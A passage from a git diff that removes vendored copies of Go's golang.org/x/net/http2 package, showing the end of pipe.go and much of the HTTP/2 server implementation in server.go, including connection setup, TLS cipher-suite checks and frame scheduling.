BreakWithError(err error) { p.closeWithError(&p.breakErr, err, nil) } - -// closeWithErrorAndCode is like CloseWithError but also sets some code to run -// in the caller's goroutine before returning the error. -func (p *pipe) closeWithErrorAndCode(err error, fn func()) { p.closeWithError(&p.err, err, fn) } - -func (p *pipe) closeWithError(dst *error, err error, fn func()) { - if err == nil { - panic("err must be non-nil") - } - p.mu.Lock() - defer p.mu.Unlock() - if p.c.L == nil { - p.c.L = &p.mu - } - defer p.c.Signal() - if *dst != nil { - // Already been done. 
- return - } - p.readFn = fn - if dst == &p.breakErr { - p.b = nil - } - *dst = err - p.closeDoneLocked() -} - -// requires p.mu be held. -func (p *pipe) closeDoneLocked() { - if p.donec == nil { - return - } - // Close if unclosed. This isn't racy since we always - // hold p.mu while closing. - select { - case <-p.donec: - default: - close(p.donec) - } -} - -// Err returns the error (if any) first set by BreakWithError or CloseWithError. -func (p *pipe) Err() error { - p.mu.Lock() - defer p.mu.Unlock() - if p.breakErr != nil { - return p.breakErr - } - return p.err -} - -// Done returns a channel which is closed if and when this pipe is closed -// with CloseWithError. -func (p *pipe) Done() <-chan struct{} { - p.mu.Lock() - defer p.mu.Unlock() - if p.donec == nil { - p.donec = make(chan struct{}) - if p.err != nil || p.breakErr != nil { - // Already hit an error. - p.closeDoneLocked() - } - } - return p.donec -} diff --git a/vendor/golang.org/x/net/http2/server.go b/vendor/golang.org/x/net/http2/server.go deleted file mode 100644 index eae143dd..00000000 --- a/vendor/golang.org/x/net/http2/server.go +++ /dev/null @@ -1,2857 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// TODO: turn off the serve goroutine when idle, so -// an idle conn only has the readFrames goroutine active. (which could -// also be optimized probably to pin less memory in crypto/tls). This -// would involve tracking when the serve goroutine is active (atomic -// int32 read/CAS probably?) and starting it up when frames arrive, -// and shutting it down when all handlers exit. the occasional PING -// packets could use time.AfterFunc to call sc.wakeStartServeLoop() -// (which is a no-op if already running) and then queue the PING write -// as normal. The serve loop would then exit in most cases (if no -// Handlers running) and not be woken up again until the PING packet -// returns. - -// TODO (maybe): add a mechanism for Handlers to going into -// half-closed-local mode (rw.(io.Closer) test?) but not exit their -// handler, and continue to be able to read from the -// Request.Body. This would be a somewhat semantic change from HTTP/1 -// (or at least what we expose in net/http), so I'd probably want to -// add it there too. For now, this package says that returning from -// the Handler ServeHTTP function means you're both done reading and -// done writing, without a way to stop just one or the other. - -package http2 - -import ( - "bufio" - "bytes" - "crypto/tls" - "errors" - "fmt" - "io" - "log" - "math" - "net" - "net/http" - "net/textproto" - "net/url" - "os" - "reflect" - "runtime" - "strconv" - "strings" - "sync" - "time" - - "golang.org/x/net/http2/hpack" -) - -const ( - prefaceTimeout = 10 * time.Second - firstSettingsTimeout = 2 * time.Second // should be in-flight with preface anyway - handlerChunkWriteSize = 4 << 10 - defaultMaxStreams = 250 // TODO: make this 100 as the GFE seems to? -) - -var ( - errClientDisconnected = errors.New("client disconnected") - errClosedBody = errors.New("body closed by handler") - errHandlerComplete = errors.New("http2: request body closed due to handler exiting") - errStreamClosed = errors.New("http2: stream closed") -) - -var responseWriterStatePool = sync.Pool{ - New: func() interface{} { - rws := &responseWriterState{} - rws.bw = bufio.NewWriterSize(chunkWriter{rws}, handlerChunkWriteSize) - return rws - }, -} - -// Test hooks. 
-var ( - testHookOnConn func() - testHookGetServerConn func(*serverConn) - testHookOnPanicMu *sync.Mutex // nil except in tests - testHookOnPanic func(sc *serverConn, panicVal interface{}) (rePanic bool) -) - -// Server is an HTTP/2 server. -type Server struct { - // MaxHandlers limits the number of http.Handler ServeHTTP goroutines - // which may run at a time over all connections. - // Negative or zero no limit. - // TODO: implement - MaxHandlers int - - // MaxConcurrentStreams optionally specifies the number of - // concurrent streams that each client may have open at a - // time. This is unrelated to the number of http.Handler goroutines - // which may be active globally, which is MaxHandlers. - // If zero, MaxConcurrentStreams defaults to at least 100, per - // the HTTP/2 spec's recommendations. - MaxConcurrentStreams uint32 - - // MaxReadFrameSize optionally specifies the largest frame - // this server is willing to read. A valid value is between - // 16k and 16M, inclusive. If zero or otherwise invalid, a - // default value is used. - MaxReadFrameSize uint32 - - // PermitProhibitedCipherSuites, if true, permits the use of - // cipher suites prohibited by the HTTP/2 spec. - PermitProhibitedCipherSuites bool - - // IdleTimeout specifies how long until idle clients should be - // closed with a GOAWAY frame. PING frames are not considered - // activity for the purposes of IdleTimeout. - IdleTimeout time.Duration - - // MaxUploadBufferPerConnection is the size of the initial flow - // control window for each connections. The HTTP/2 spec does not - // allow this to be smaller than 65535 or larger than 2^32-1. - // If the value is outside this range, a default value will be - // used instead. - MaxUploadBufferPerConnection int32 - - // MaxUploadBufferPerStream is the size of the initial flow control - // window for each stream. The HTTP/2 spec does not allow this to - // be larger than 2^32-1. If the value is zero or larger than the - // maximum, a default value will be used instead. - MaxUploadBufferPerStream int32 - - // NewWriteScheduler constructs a write scheduler for a connection. - // If nil, a default scheduler is chosen. - NewWriteScheduler func() WriteScheduler - - // Internal state. This is a pointer (rather than embedded directly) - // so that we don't embed a Mutex in this struct, which will make the - // struct non-copyable, which might break some callers. 
- state *serverInternalState -} - -func (s *Server) initialConnRecvWindowSize() int32 { - if s.MaxUploadBufferPerConnection > initialWindowSize { - return s.MaxUploadBufferPerConnection - } - return 1 << 20 -} - -func (s *Server) initialStreamRecvWindowSize() int32 { - if s.MaxUploadBufferPerStream > 0 { - return s.MaxUploadBufferPerStream - } - return 1 << 20 -} - -func (s *Server) maxReadFrameSize() uint32 { - if v := s.MaxReadFrameSize; v >= minMaxFrameSize && v <= maxFrameSize { - return v - } - return defaultMaxReadFrameSize -} - -func (s *Server) maxConcurrentStreams() uint32 { - if v := s.MaxConcurrentStreams; v > 0 { - return v - } - return defaultMaxStreams -} - -type serverInternalState struct { - mu sync.Mutex - activeConns map[*serverConn]struct{} -} - -func (s *serverInternalState) registerConn(sc *serverConn) { - if s == nil { - return // if the Server was used without calling ConfigureServer - } - s.mu.Lock() - s.activeConns[sc] = struct{}{} - s.mu.Unlock() -} - -func (s *serverInternalState) unregisterConn(sc *serverConn) { - if s == nil { - return // if the Server was used without calling ConfigureServer - } - s.mu.Lock() - delete(s.activeConns, sc) - s.mu.Unlock() -} - -func (s *serverInternalState) startGracefulShutdown() { - if s == nil { - return // if the Server was used without calling ConfigureServer - } - s.mu.Lock() - for sc := range s.activeConns { - sc.startGracefulShutdown() - } - s.mu.Unlock() -} - -// ConfigureServer adds HTTP/2 support to a net/http Server. -// -// The configuration conf may be nil. -// -// ConfigureServer must be called before s begins serving. -func ConfigureServer(s *http.Server, conf *Server) error { - if s == nil { - panic("nil *http.Server") - } - if conf == nil { - conf = new(Server) - } - conf.state = &serverInternalState{activeConns: make(map[*serverConn]struct{})} - if err := configureServer18(s, conf); err != nil { - return err - } - if err := configureServer19(s, conf); err != nil { - return err - } - - if s.TLSConfig == nil { - s.TLSConfig = new(tls.Config) - } else if s.TLSConfig.CipherSuites != nil { - // If they already provided a CipherSuite list, return - // an error if it has a bad order or is missing - // ECDHE_RSA_WITH_AES_128_GCM_SHA256. - const requiredCipher = tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 - haveRequired := false - sawBad := false - for i, cs := range s.TLSConfig.CipherSuites { - if cs == requiredCipher { - haveRequired = true - } - if isBadCipher(cs) { - sawBad = true - } else if sawBad { - return fmt.Errorf("http2: TLSConfig.CipherSuites index %d contains an HTTP/2-approved cipher suite (%#04x), but it comes after unapproved cipher suites. With this configuration, clients that don't support previous, approved cipher suites may be given an unapproved one and reject the connection.", i, cs) - } - } - if !haveRequired { - return fmt.Errorf("http2: TLSConfig.CipherSuites is missing HTTP/2-required TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256") - } - } - - // Note: not setting MinVersion to tls.VersionTLS12, - // as we don't want to interfere with HTTP/1.1 traffic - // on the user's server. We enforce TLS 1.2 later once - // we accept a connection. Ideally this should be done - // during next-proto selection, but using TLS <1.2 with - // HTTP/2 is still the client's bug. 
- - s.TLSConfig.PreferServerCipherSuites = true - - haveNPN := false - for _, p := range s.TLSConfig.NextProtos { - if p == NextProtoTLS { - haveNPN = true - break - } - } - if !haveNPN { - s.TLSConfig.NextProtos = append(s.TLSConfig.NextProtos, NextProtoTLS) - } - - if s.TLSNextProto == nil { - s.TLSNextProto = map[string]func(*http.Server, *tls.Conn, http.Handler){} - } - protoHandler := func(hs *http.Server, c *tls.Conn, h http.Handler) { - if testHookOnConn != nil { - testHookOnConn() - } - conf.ServeConn(c, &ServeConnOpts{ - Handler: h, - BaseConfig: hs, - }) - } - s.TLSNextProto[NextProtoTLS] = protoHandler - return nil -} - -// ServeConnOpts are options for the Server.ServeConn method. -type ServeConnOpts struct { - // BaseConfig optionally sets the base configuration - // for values. If nil, defaults are used. - BaseConfig *http.Server - - // Handler specifies which handler to use for processing - // requests. If nil, BaseConfig.Handler is used. If BaseConfig - // or BaseConfig.Handler is nil, http.DefaultServeMux is used. - Handler http.Handler -} - -func (o *ServeConnOpts) baseConfig() *http.Server { - if o != nil && o.BaseConfig != nil { - return o.BaseConfig - } - return new(http.Server) -} - -func (o *ServeConnOpts) handler() http.Handler { - if o != nil { - if o.Handler != nil { - return o.Handler - } - if o.BaseConfig != nil && o.BaseConfig.Handler != nil { - return o.BaseConfig.Handler - } - } - return http.DefaultServeMux -} - -// ServeConn serves HTTP/2 requests on the provided connection and -// blocks until the connection is no longer readable. -// -// ServeConn starts speaking HTTP/2 assuming that c has not had any -// reads or writes. It writes its initial settings frame and expects -// to be able to read the preface and settings frame from the -// client. If c has a ConnectionState method like a *tls.Conn, the -// ConnectionState is used to verify the TLS ciphersuite and to set -// the Request.TLS field in Handlers. -// -// ServeConn does not support h2c by itself. Any h2c support must be -// implemented in terms of providing a suitably-behaving net.Conn. -// -// The opts parameter is optional. If nil, default values are used. -func (s *Server) ServeConn(c net.Conn, opts *ServeConnOpts) { - baseCtx, cancel := serverConnBaseContext(c, opts) - defer cancel() - - sc := &serverConn{ - srv: s, - hs: opts.baseConfig(), - conn: c, - baseCtx: baseCtx, - remoteAddrStr: c.RemoteAddr().String(), - bw: newBufferedWriter(c), - handler: opts.handler(), - streams: make(map[uint32]*stream), - readFrameCh: make(chan readFrameResult), - wantWriteFrameCh: make(chan FrameWriteRequest, 8), - serveMsgCh: make(chan interface{}, 8), - wroteFrameCh: make(chan frameWriteResult, 1), // buffered; one send in writeFrameAsync - bodyReadCh: make(chan bodyReadMsg), // buffering doesn't matter either way - doneServing: make(chan struct{}), - clientMaxStreams: math.MaxUint32, // Section 6.5.2: "Initially, there is no limit to this value" - advMaxStreams: s.maxConcurrentStreams(), - initialStreamSendWindowSize: initialWindowSize, - maxFrameSize: initialMaxFrameSize, - headerTableSize: initialHeaderTableSize, - serveG: newGoroutineLock(), - pushEnabled: true, - } - - s.state.registerConn(sc) - defer s.state.unregisterConn(sc) - - // The net/http package sets the write deadline from the - // http.Server.WriteTimeout during the TLS handshake, but then - // passes the connection off to us with the deadline already set. - // Write deadlines are set per stream in serverConn.newStream. 
- // Disarm the net.Conn write deadline here. - if sc.hs.WriteTimeout != 0 { - sc.conn.SetWriteDeadline(time.Time{}) - } - - if s.NewWriteScheduler != nil { - sc.writeSched = s.NewWriteScheduler() - } else { - sc.writeSched = NewRandomWriteScheduler() - } - - // These start at the RFC-specified defaults. If there is a higher - // configured value for inflow, that will be updated when we send a - // WINDOW_UPDATE shortly after sending SETTINGS. - sc.flow.add(initialWindowSize) - sc.inflow.add(initialWindowSize) - sc.hpackEncoder = hpack.NewEncoder(&sc.headerWriteBuf) - - fr := NewFramer(sc.bw, c) - fr.ReadMetaHeaders = hpack.NewDecoder(initialHeaderTableSize, nil) - fr.MaxHeaderListSize = sc.maxHeaderListSize() - fr.SetMaxReadFrameSize(s.maxReadFrameSize()) - sc.framer = fr - - if tc, ok := c.(connectionStater); ok { - sc.tlsState = new(tls.ConnectionState) - *sc.tlsState = tc.ConnectionState() - // 9.2 Use of TLS Features - // An implementation of HTTP/2 over TLS MUST use TLS - // 1.2 or higher with the restrictions on feature set - // and cipher suite described in this section. Due to - // implementation limitations, it might not be - // possible to fail TLS negotiation. An endpoint MUST - // immediately terminate an HTTP/2 connection that - // does not meet the TLS requirements described in - // this section with a connection error (Section - // 5.4.1) of type INADEQUATE_SECURITY. - if sc.tlsState.Version < tls.VersionTLS12 { - sc.rejectConn(ErrCodeInadequateSecurity, "TLS version too low") - return - } - - if sc.tlsState.ServerName == "" { - // Client must use SNI, but we don't enforce that anymore, - // since it was causing problems when connecting to bare IP - // addresses during development. - // - // TODO: optionally enforce? Or enforce at the time we receive - // a new request, and verify the the ServerName matches the :authority? - // But that precludes proxy situations, perhaps. - // - // So for now, do nothing here again. - } - - if !s.PermitProhibitedCipherSuites && isBadCipher(sc.tlsState.CipherSuite) { - // "Endpoints MAY choose to generate a connection error - // (Section 5.4.1) of type INADEQUATE_SECURITY if one of - // the prohibited cipher suites are negotiated." - // - // We choose that. In my opinion, the spec is weak - // here. It also says both parties must support at least - // TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 so there's no - // excuses here. If we really must, we could allow an - // "AllowInsecureWeakCiphers" option on the server later. - // Let's see how it plays out first. - sc.rejectConn(ErrCodeInadequateSecurity, fmt.Sprintf("Prohibited TLS 1.2 Cipher Suite: %x", sc.tlsState.CipherSuite)) - return - } - } - - if hook := testHookGetServerConn; hook != nil { - hook(sc) - } - sc.serve() -} - -func (sc *serverConn) rejectConn(err ErrCode, debug string) { - sc.vlogf("http2: server rejecting conn: %v, %s", err, debug) - // ignoring errors. hanging up anyway. 
- sc.framer.WriteGoAway(0, err, []byte(debug)) - sc.bw.Flush() - sc.conn.Close() -} - -type serverConn struct { - // Immutable: - srv *Server - hs *http.Server - conn net.Conn - bw *bufferedWriter // writing to conn - handler http.Handler - baseCtx contextContext - framer *Framer - doneServing chan struct{} // closed when serverConn.serve ends - readFrameCh chan readFrameResult // written by serverConn.readFrames - wantWriteFrameCh chan FrameWriteRequest // from handlers -> serve - wroteFrameCh chan frameWriteResult // from writeFrameAsync -> serve, tickles more frame writes - bodyReadCh chan bodyReadMsg // from handlers -> serve - serveMsgCh chan interface{} // misc messages & code to send to / run on the serve loop - flow flow // conn-wide (not stream-specific) outbound flow control - inflow flow // conn-wide inbound flow control - tlsState *tls.ConnectionState // shared by all handlers, like net/http - remoteAddrStr string - writeSched WriteScheduler - - // Everything following is owned by the serve loop; use serveG.check(): - serveG goroutineLock // used to verify funcs are on serve() - pushEnabled bool - sawFirstSettings bool // got the initial SETTINGS frame after the preface - needToSendSettingsAck bool - unackedSettings int // how many SETTINGS have we sent without ACKs? - clientMaxStreams uint32 // SETTINGS_MAX_CONCURRENT_STREAMS from client (our PUSH_PROMISE limit) - advMaxStreams uint32 // our SETTINGS_MAX_CONCURRENT_STREAMS advertised the client - curClientStreams uint32 // number of open streams initiated by the client - curPushedStreams uint32 // number of open streams initiated by server push - maxClientStreamID uint32 // max ever seen from client (odd), or 0 if there have been no client requests - maxPushPromiseID uint32 // ID of the last push promise (even), or 0 if there have been no pushes - streams map[uint32]*stream - initialStreamSendWindowSize int32 - maxFrameSize int32 - headerTableSize uint32 - peerMaxHeaderListSize uint32 // zero means unknown (default) - canonHeader map[string]string // http2-lower-case -> Go-Canonical-Case - writingFrame bool // started writing a frame (on serve goroutine or separate) - writingFrameAsync bool // started a frame on its own goroutine but haven't heard back on wroteFrameCh - needsFrameFlush bool // last frame write wasn't a flush - inGoAway bool // we've started to or sent GOAWAY - inFrameScheduleLoop bool // whether we're in the scheduleFrameWrite loop - needToSendGoAway bool // we need to schedule a GOAWAY frame write - goAwayCode ErrCode - shutdownTimer *time.Timer // nil until used - idleTimer *time.Timer // nil if unused - - // Owned by the writeFrameAsync goroutine: - headerWriteBuf bytes.Buffer - hpackEncoder *hpack.Encoder - - // Used by startGracefulShutdown. - shutdownOnce sync.Once -} - -func (sc *serverConn) maxHeaderListSize() uint32 { - n := sc.hs.MaxHeaderBytes - if n <= 0 { - n = http.DefaultMaxHeaderBytes - } - // http2's count is in a slightly different unit and includes 32 bytes per pair. - // So, take the net/http.Server value and pad it up a bit, assuming 10 headers. - const perFieldOverhead = 32 // per http2 spec - const typicalHeaders = 10 // conservative - return uint32(n + typicalHeaders*perFieldOverhead) -} - -func (sc *serverConn) curOpenStreams() uint32 { - sc.serveG.check() - return sc.curClientStreams + sc.curPushedStreams -} - -// stream represents a stream. This is the minimal metadata needed by -// the serve goroutine. 
Most of the actual stream state is owned by -// the http.Handler's goroutine in the responseWriter. Because the -// responseWriter's responseWriterState is recycled at the end of a -// handler, this struct intentionally has no pointer to the -// *responseWriter{,State} itself, as the Handler ending nils out the -// responseWriter's state field. -type stream struct { - // immutable: - sc *serverConn - id uint32 - body *pipe // non-nil if expecting DATA frames - cw closeWaiter // closed wait stream transitions to closed state - ctx contextContext - cancelCtx func() - - // owned by serverConn's serve loop: - bodyBytes int64 // body bytes seen so far - declBodyBytes int64 // or -1 if undeclared - flow flow // limits writing from Handler to client - inflow flow // what the client is allowed to POST/etc to us - parent *stream // or nil - numTrailerValues int64 - weight uint8 - state streamState - resetQueued bool // RST_STREAM queued for write; set by sc.resetStream - gotTrailerHeader bool // HEADER frame for trailers was seen - wroteHeaders bool // whether we wrote headers (not status 100) - writeDeadline *time.Timer // nil if unused - - trailer http.Header // accumulated trailers - reqTrailer http.Header // handler's Request.Trailer -} - -func (sc *serverConn) Framer() *Framer { return sc.framer } -func (sc *serverConn) CloseConn() error { return sc.conn.Close() } -func (sc *serverConn) Flush() error { return sc.bw.Flush() } -func (sc *serverConn) HeaderEncoder() (*hpack.Encoder, *bytes.Buffer) { - return sc.hpackEncoder, &sc.headerWriteBuf -} - -func (sc *serverConn) state(streamID uint32) (streamState, *stream) { - sc.serveG.check() - // http://tools.ietf.org/html/rfc7540#section-5.1 - if st, ok := sc.streams[streamID]; ok { - return st.state, st - } - // "The first use of a new stream identifier implicitly closes all - // streams in the "idle" state that might have been initiated by - // that peer with a lower-valued stream identifier. For example, if - // a client sends a HEADERS frame on stream 7 without ever sending a - // frame on stream 5, then stream 5 transitions to the "closed" - // state when the first frame for stream 7 is sent or received." - if streamID%2 == 1 { - if streamID <= sc.maxClientStreamID { - return stateClosed, nil - } - } else { - if streamID <= sc.maxPushPromiseID { - return stateClosed, nil - } - } - return stateIdle, nil -} - -// setConnState calls the net/http ConnState hook for this connection, if configured. -// Note that the net/http package does StateNew and StateClosed for us. -// There is currently no plan for StateHijacked or hijacking HTTP/2 connections. -func (sc *serverConn) setConnState(state http.ConnState) { - if sc.hs.ConnState != nil { - sc.hs.ConnState(sc.conn, state) - } -} - -func (sc *serverConn) vlogf(format string, args ...interface{}) { - if VerboseLogs { - sc.logf(format, args...) - } -} - -func (sc *serverConn) logf(format string, args ...interface{}) { - if lg := sc.hs.ErrorLog; lg != nil { - lg.Printf(format, args...) - } else { - log.Printf(format, args...) - } -} - -// errno returns v's underlying uintptr, else 0. -// -// TODO: remove this helper function once http2 can use build -// tags. See comment in isClosedConnError. -func errno(v error) uintptr { - if rv := reflect.ValueOf(v); rv.Kind() == reflect.Uintptr { - return uintptr(rv.Uint()) - } - return 0 -} - -// isClosedConnError reports whether err is an error from use of a closed -// network connection. 
-func isClosedConnError(err error) bool { - if err == nil { - return false - } - - // TODO: remove this string search and be more like the Windows - // case below. That might involve modifying the standard library - // to return better error types. - str := err.Error() - if strings.Contains(str, "use of closed network connection") { - return true - } - - // TODO(bradfitz): x/tools/cmd/bundle doesn't really support - // build tags, so I can't make an http2_windows.go file with - // Windows-specific stuff. Fix that and move this, once we - // have a way to bundle this into std's net/http somehow. - if runtime.GOOS == "windows" { - if oe, ok := err.(*net.OpError); ok && oe.Op == "read" { - if se, ok := oe.Err.(*os.SyscallError); ok && se.Syscall == "wsarecv" { - const WSAECONNABORTED = 10053 - const WSAECONNRESET = 10054 - if n := errno(se.Err); n == WSAECONNRESET || n == WSAECONNABORTED { - return true - } - } - } - } - return false -} - -func (sc *serverConn) condlogf(err error, format string, args ...interface{}) { - if err == nil { - return - } - if err == io.EOF || err == io.ErrUnexpectedEOF || isClosedConnError(err) { - // Boring, expected errors. - sc.vlogf(format, args...) - } else { - sc.logf(format, args...) - } -} - -func (sc *serverConn) canonicalHeader(v string) string { - sc.serveG.check() - cv, ok := commonCanonHeader[v] - if ok { - return cv - } - cv, ok = sc.canonHeader[v] - if ok { - return cv - } - if sc.canonHeader == nil { - sc.canonHeader = make(map[string]string) - } - cv = http.CanonicalHeaderKey(v) - sc.canonHeader[v] = cv - return cv -} - -type readFrameResult struct { - f Frame // valid until readMore is called - err error - - // readMore should be called once the consumer no longer needs or - // retains f. After readMore, f is invalid and more frames can be - // read. - readMore func() -} - -// readFrames is the loop that reads incoming frames. -// It takes care to only read one frame at a time, blocking until the -// consumer is done with the frame. -// It's run on its own goroutine. -func (sc *serverConn) readFrames() { - gate := make(gate) - gateDone := gate.Done - for { - f, err := sc.framer.ReadFrame() - select { - case sc.readFrameCh <- readFrameResult{f, err, gateDone}: - case <-sc.doneServing: - return - } - select { - case <-gate: - case <-sc.doneServing: - return - } - if terminalReadFrameError(err) { - return - } - } -} - -// frameWriteResult is the message passed from writeFrameAsync to the serve goroutine. -type frameWriteResult struct { - wr FrameWriteRequest // what was written (or attempted) - err error // result of the writeFrame call -} - -// writeFrameAsync runs in its own goroutine and writes a single frame -// and then reports when it's done. -// At most one goroutine can be running writeFrameAsync at a time per -// serverConn. -func (sc *serverConn) writeFrameAsync(wr FrameWriteRequest) { - err := wr.write.writeFrame(sc) - sc.wroteFrameCh <- frameWriteResult{wr, err} -} - -func (sc *serverConn) closeAllStreamsOnConnClose() { - sc.serveG.check() - for _, st := range sc.streams { - sc.closeStream(st, errClientDisconnected) - } -} - -func (sc *serverConn) stopShutdownTimer() { - sc.serveG.check() - if t := sc.shutdownTimer; t != nil { - t.Stop() - } -} - -func (sc *serverConn) notePanic() { - // Note: this is for serverConn.serve panicking, not http.Handler code. 
- if testHookOnPanicMu != nil { - testHookOnPanicMu.Lock() - defer testHookOnPanicMu.Unlock() - } - if testHookOnPanic != nil { - if e := recover(); e != nil { - if testHookOnPanic(sc, e) { - panic(e) - } - } - } -} - -func (sc *serverConn) serve() { - sc.serveG.check() - defer sc.notePanic() - defer sc.conn.Close() - defer sc.closeAllStreamsOnConnClose() - defer sc.stopShutdownTimer() - defer close(sc.doneServing) // unblocks handlers trying to send - - if VerboseLogs { - sc.vlogf("http2: server connection from %v on %p", sc.conn.RemoteAddr(), sc.hs) - } - - sc.writeFrame(FrameWriteRequest{ - write: writeSettings{ - {SettingMaxFrameSize, sc.srv.maxReadFrameSize()}, - {SettingMaxConcurrentStreams, sc.advMaxStreams}, - {SettingMaxHeaderListSize, sc.maxHeaderListSize()}, - {SettingInitialWindowSize, uint32(sc.srv.initialStreamRecvWindowSize())}, - }, - }) - sc.unackedSettings++ - - // Each connection starts with intialWindowSize inflow tokens. - // If a higher value is configured, we add more tokens. - if diff := sc.srv.initialConnRecvWindowSize() - initialWindowSize; diff > 0 { - sc.sendWindowUpdate(nil, int(diff)) - } - - if err := sc.readPreface(); err != nil { - sc.condlogf(err, "http2: server: error reading preface from client %v: %v", sc.conn.RemoteAddr(), err) - return - } - // Now that we've got the preface, get us out of the - // "StateNew" state. We can't go directly to idle, though. - // Active means we read some data and anticipate a request. We'll - // do another Active when we get a HEADERS frame. - sc.setConnState(http.StateActive) - sc.setConnState(http.StateIdle) - - if sc.srv.IdleTimeout != 0 { - sc.idleTimer = time.AfterFunc(sc.srv.IdleTimeout, sc.onIdleTimer) - defer sc.idleTimer.Stop() - } - - go sc.readFrames() // closed by defer sc.conn.Close above - - settingsTimer := time.AfterFunc(firstSettingsTimeout, sc.onSettingsTimer) - defer settingsTimer.Stop() - - loopNum := 0 - for { - loopNum++ - select { - case wr := <-sc.wantWriteFrameCh: - if se, ok := wr.write.(StreamError); ok { - sc.resetStream(se) - break - } - sc.writeFrame(wr) - case res := <-sc.wroteFrameCh: - sc.wroteFrame(res) - case res := <-sc.readFrameCh: - if !sc.processFrameFromReader(res) { - return - } - res.readMore() - if settingsTimer != nil { - settingsTimer.Stop() - settingsTimer = nil - } - case m := <-sc.bodyReadCh: - sc.noteBodyRead(m.st, m.n) - case msg := <-sc.serveMsgCh: - switch v := msg.(type) { - case func(int): - v(loopNum) // for testing - case *serverMessage: - switch v { - case settingsTimerMsg: - sc.logf("timeout waiting for SETTINGS frames from %v", sc.conn.RemoteAddr()) - return - case idleTimerMsg: - sc.vlogf("connection is idle") - sc.goAway(ErrCodeNo) - case shutdownTimerMsg: - sc.vlogf("GOAWAY close timer fired; closing conn from %v", sc.conn.RemoteAddr()) - return - case gracefulShutdownMsg: - sc.startGracefulShutdownInternal() - default: - panic("unknown timer") - } - case *startPushRequest: - sc.startPush(v) - default: - panic(fmt.Sprintf("unexpected type %T", v)) - } - } - - if sc.inGoAway && sc.curOpenStreams() == 0 && !sc.needToSendGoAway && !sc.writingFrame { - return - } - } -} - -func (sc *serverConn) awaitGracefulShutdown(sharedCh <-chan struct{}, privateCh chan struct{}) { - select { - case <-sc.doneServing: - case <-sharedCh: - close(privateCh) - } -} - -type serverMessage int - -// Message values sent to serveMsgCh. 
-var ( - settingsTimerMsg = new(serverMessage) - idleTimerMsg = new(serverMessage) - shutdownTimerMsg = new(serverMessage) - gracefulShutdownMsg = new(serverMessage) -) - -func (sc *serverConn) onSettingsTimer() { sc.sendServeMsg(settingsTimerMsg) } -func (sc *serverConn) onIdleTimer() { sc.sendServeMsg(idleTimerMsg) } -func (sc *serverConn) onShutdownTimer() { sc.sendServeMsg(shutdownTimerMsg) } - -func (sc *serverConn) sendServeMsg(msg interface{}) { - sc.serveG.checkNotOn() // NOT - select { - case sc.serveMsgCh <- msg: - case <-sc.doneServing: - } -} - -// readPreface reads the ClientPreface greeting from the peer -// or returns an error on timeout or an invalid greeting. -func (sc *serverConn) readPreface() error { - errc := make(chan error, 1) - go func() { - // Read the client preface - buf := make([]byte, len(ClientPreface)) - if _, err := io.ReadFull(sc.conn, buf); err != nil { - errc <- err - } else if !bytes.Equal(buf, clientPreface) { - errc <- fmt.Errorf("bogus greeting %q", buf) - } else { - errc <- nil - } - }() - timer := time.NewTimer(prefaceTimeout) // TODO: configurable on *Server? - defer timer.Stop() - select { - case <-timer.C: - return errors.New("timeout waiting for client preface") - case err := <-errc: - if err == nil { - if VerboseLogs { - sc.vlogf("http2: server: client %v said hello", sc.conn.RemoteAddr()) - } - } - return err - } -} - -var errChanPool = sync.Pool{ - New: func() interface{} { return make(chan error, 1) }, -} - -var writeDataPool = sync.Pool{ - New: func() interface{} { return new(writeData) }, -} - -// writeDataFromHandler writes DATA response frames from a handler on -// the given stream. -func (sc *serverConn) writeDataFromHandler(stream *stream, data []byte, endStream bool) error { - ch := errChanPool.Get().(chan error) - writeArg := writeDataPool.Get().(*writeData) - *writeArg = writeData{stream.id, data, endStream} - err := sc.writeFrameFromHandler(FrameWriteRequest{ - write: writeArg, - stream: stream, - done: ch, - }) - if err != nil { - return err - } - var frameWriteDone bool // the frame write is done (successfully or not) - select { - case err = <-ch: - frameWriteDone = true - case <-sc.doneServing: - return errClientDisconnected - case <-stream.cw: - // If both ch and stream.cw were ready (as might - // happen on the final Write after an http.Handler - // ends), prefer the write result. Otherwise this - // might just be us successfully closing the stream. - // The writeFrameAsync and serve goroutines guarantee - // that the ch send will happen before the stream.cw - // close. - select { - case err = <-ch: - frameWriteDone = true - default: - return errStreamClosed - } - } - errChanPool.Put(ch) - if frameWriteDone { - writeDataPool.Put(writeArg) - } - return err -} - -// writeFrameFromHandler sends wr to sc.wantWriteFrameCh, but aborts -// if the connection has gone away. -// -// This must not be run from the serve goroutine itself, else it might -// deadlock writing to sc.wantWriteFrameCh (which is only mildly -// buffered and is read by serve itself). If you're on the serve -// goroutine, call writeFrame instead. -func (sc *serverConn) writeFrameFromHandler(wr FrameWriteRequest) error { - sc.serveG.checkNotOn() // NOT - select { - case sc.wantWriteFrameCh <- wr: - return nil - case <-sc.doneServing: - // Serve loop is gone. - // Client has closed their connection to the server. - return errClientDisconnected - } -} - -// writeFrame schedules a frame to write and sends it if there's nothing -// already being written. 
-// -// There is no pushback here (the serve goroutine never blocks). It's -// the http.Handlers that block, waiting for their previous frames to -// make it onto the wire -// -// If you're not on the serve goroutine, use writeFrameFromHandler instead. -func (sc *serverConn) writeFrame(wr FrameWriteRequest) { - sc.serveG.check() - - // If true, wr will not be written and wr.done will not be signaled. - var ignoreWrite bool - - // We are not allowed to write frames on closed streams. RFC 7540 Section - // 5.1.1 says: "An endpoint MUST NOT send frames other than PRIORITY on - // a closed stream." Our server never sends PRIORITY, so that exception - // does not apply. - // - // The serverConn might close an open stream while the stream's handler - // is still running. For example, the server might close a stream when it - // receives bad data from the client. If this happens, the handler might - // attempt to write a frame after the stream has been closed (since the - // handler hasn't yet been notified of the close). In this case, we simply - // ignore the frame. The handler will notice that the stream is closed when - // it waits for the frame to be written. - // - // As an exception to this rule, we allow sending RST_STREAM after close. - // This allows us to immediately reject new streams without tracking any - // state for those streams (except for the queued RST_STREAM frame). This - // may result in duplicate RST_STREAMs in some cases, but the client should - // ignore those. - if wr.StreamID() != 0 { - _, isReset := wr.write.(StreamError) - if state, _ := sc.state(wr.StreamID()); state == stateClosed && !isReset { - ignoreWrite = true - } - } - - // Don't send a 100-continue response if we've already sent headers. - // See golang.org/issue/14030. - switch wr.write.(type) { - case *writeResHeaders: - wr.stream.wroteHeaders = true - case write100ContinueHeadersFrame: - if 